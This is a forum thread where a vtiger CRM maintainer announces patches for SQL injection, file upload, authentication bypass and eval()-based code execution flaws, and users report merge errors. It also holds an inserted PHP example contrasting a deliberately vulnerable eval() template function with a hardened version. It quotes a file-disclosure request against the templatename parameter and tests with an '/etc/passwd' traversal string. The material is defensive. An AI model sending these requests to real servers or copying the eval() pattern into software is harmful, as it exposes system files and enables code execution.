Hi,
We have fixed the following vulnerability issues for the vtigerCRM 4.2 Patch 2 version. Kindly download the attached zip file and unzip it under your vtigerCRM home directory.
The list of vulnerability issues fixed is:
Posted by D.Fabian / SEC-CONSULT/ ww.sec-consult.com
a) Multiple SQL Injection Vulnerabilities
b) Cross Site Scripting
c) Path Traversal/File Disclosure
d) Arbitrary File Upload
Posted by Christopher Kunz / www.hardened-php.net
a) Arbitrary File Upload
b) Authentication ByPass
c) Unsafe File Inclusion
d) Arbitrary code execution
List of files changed
a) index.php
b) modules/Users/Authenticate.php
c) include/utils.php
d) include/database/PearDatabase.php
e) modules/uploads/add2db.php
f) data/CRMEntity.php
g) log4php/appenders/LoggerAppenderFile.php
Note: Kindly apply the fixes on the vtigerCRM 4.2 Patch 2 version of the files. Please note that after applying the patch the read permission for the vtigercrm.log file will be revoked for Linux users; Windows users should kindly change the permissions manually.
Philip
P.S. Kindly take a backup of these files in case you have made some changes to them.
Comments
With respect to the arbitrary upload issue, the fix is helpful, but is there a good reason why the original $upload_dir (set in /config.php) has been replaced by $uploaddir (set in /modules/uploads/add2db.php)? It seems to me that the logical place to set such a value *is* /config.php.
Aside from the fact it's essentially a constant, putting it in /config.php would make more sense from an upgradeability standpoint.
Oh, and it would also seem to be sensible to change the default upload directory to something outside of the site tree. People should have to change the defaults to make it less secure, as opposed to the other way around.
Yes! It's a valid suggestion; we'll take this up in our future release.
We'll check the feasibility of making the upload directory configurable in config.php and implement this if it doesn't have any adverse effect.
Philip
Here is the consolidated vulnerability fix in zip format for vtigerCRM 4.2 Patch 2. This zip has the fix for the following vulnerability issue in addition to the fixes given earlier.
Vulnerability issue addressed:
Remote code execution (posted by D.Fabian / SEC-CONSULT / ww.sec-consult.com)
The parameter "templatename" is passed to eval() without any prior validation.
Example:
index.php?module=users&action=templatemerge&templatename=c:\boot.ini
Fix:
In mail merge, templateid will be used instead of templatename. The following files have been modified:
1) adodb/databaseschema.xml
2) modules/accounts/detailview.php
3) modules/accounts/merge.php
4) modules/contacts/detailview.php
5) modules/contacts/merge.php
6) modules/helpdesk/detailview.php
7) modules/helpdesk/merge.php
8) modules/leads/detailview.php
9) modules/leads/merge.php
10) modules/users/add2db.php
11) modules/users/binaryfilelist.php
12) modules/users/deletewordtemplate.php
13) modules/users/downloadfile.php
14) modules/users/listwordtemplates.php
15) modules/users/upload.php
16) modules/users/userinfoutil.php
Procedure to apply:
1) Download the zip and unzip it under the vtigerCRM home directory (where your index.php resides).
2) Run the file wordtemplate_fix.php (present inside the vtigerCRM home directory) from your web browser. The message "table 'wordtemplates' modified" will be displayed, which confirms the required changes have been made to the wordtemplate table.
Philip
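As an added example, not code from this thread or from the vtiger CRM code base: the pattern Philip describes (a request parameter "templatename" reaching eval() and the filesystem unchecked) beside the shape of the fix (the request carries an integer "templateid" that is looked up in a table, and the stored file name is then resolved inside a fixed template directory). The table, directory, file names and the two functions are constructed for the example and stand in for, not reproduce, the vtiger files listed above. It is written for PHP 8 (str_starts_with) with SQLite through PDO so it runs offline, and the hardened version also rejects a directory path, which is the failure mode reported in the follow-up post below.

```php
<?php
// Added example, not vtiger code: user-controlled template name vs. template id lookup.
declare(strict_types=1);

// Constructed sample data standing in for a wordtemplates table.
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE wordtemplates (templateid INTEGER PRIMARY KEY, templatename TEXT NOT NULL)');
$pdo->exec("INSERT INTO wordtemplates VALUES (1, 'Quote.doc'), (2, 'Invoice.doc')");

// Hypothetical template directory; in a deployment this should sit outside the web root.
$templateDir = sys_get_temp_dir() . '/wordtemplates_example';
@mkdir($templateDir, 0700, true);
file_put_contents($templateDir . '/Quote.doc', 'sample template body');

// VULNERABLE SHAPE (illustrative, not the original vtiger code): the name comes
// straight from the request and is interpolated into a string handed to eval().
// Any value, including an absolute path such as c:\boot.ini, is used as-is, and a
// value containing a closing quote is executed as PHP rather than treated as data.
function mergeByNameUnsafe(string $templatename, string $templateDir): string
{
    eval('$path = "' . $templateDir . '/' . $templatename . '";');   // never do this
    return (string) @file_get_contents($path);
}

// HARDENED SHAPE: the request carries only an integer id; the file name is read
// from the database, and the resolved path is confined to the template directory.
function mergeByIdSafe(PDO $pdo, mixed $rawId, string $templateDir): string
{
    // 1. Accept nothing but a positive integer from the request.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('templateid must be a positive integer');
    }

    // 2. Resolve the name through a parameterised query, never from user input.
    $stmt = $pdo->prepare('SELECT templatename FROM wordtemplates WHERE templateid = :id');
    $stmt->execute([':id' => $id]);
    $name = $stmt->fetchColumn();
    if ($name === false) {
        throw new RuntimeException('no such template');
    }

    // 3. Defence in depth: reduce even the stored name to a basename and require
    //    the canonical path to stay inside the template directory.
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . basename((string) $name));
    if ($base === false || $path === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        throw new RuntimeException('template path escapes the template directory');
    }
    // 4. A directory (the "is a directory" warning seen after the first fix) is not a template.
    if (!is_file($path)) {
        throw new RuntimeException('template is not a regular file');
    }
    return (string) file_get_contents($path);
}

// Usage (constructed request values): the page now sends templateid, not templatename.
echo mergeByIdSafe($pdo, '1', $templateDir), PHP_EOL;

foreach (['../../../../etc/passwd', 'c:\\boot.ini', '0', '2', 'abc'] as $bad) {
    try {
        mergeByIdSafe($pdo, $bad, $templateDir);
    } catch (Throwable $e) {
        echo "rejected [$bad]: ", $e->getMessage(), PHP_EOL;
    }
}
```

The id lookup alone closes the eval() path, because no request string is ever concatenated into code; the basename and realpath checks are a second fence so that a tampered database row cannot reintroduce path traversal. Template id 2 is rejected here only because Invoice.doc was not created in the constructed directory.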
It is really good to have these security updates! After applying this fix, uploading of word templates, merge in Accounts and merge in HelpDesk are working perfectly, but in Leads and Contacts mail merge is giving the following errors:
In Leads the error is:
warning: fopen(/home/public_html/vtiger/test/wordtemplatedownload/): failed to open stream: is a directory in /home/public_html/vtiger/modules/leads/merge.php on line 56
warning: fwrite(): supplied argument is not a valid stream resource in /home/public_html/vtiger/modules/leads/merge.php on line 58
warning: fclose(): supplied argument is not a valid stream resource in /home/public_html/vtiger/modules/leads/merge.php on line 59
And in Contacts the error is:
fatal error: call to a member function on a non-object in /home/public_html/vtiger/include/database/peardatabase.php on line 426
-ts-
Thanks for pointing this out. The issue in the Contact and Lead modules during merge has been fixed; please use the attached consolidated zip.
Philip
Procedure to apply:
1) Download the zip and unzip it under the vtigerCRM home directory (where your index.php resides).
2) Run the file wordtemplate_fix.php (present inside the vtigerCRM home directory) from your web browser. The message "table 'wordtemplates' modified" will be displayed, which confirms the required changes have been made to the wordtemplate table.
When I apply the security changes in test, I get my contacts and accounts showing only their names, the page is very wide as it shows all 1159 contact links in the view bar, and I lose the email button on these pages.
Jay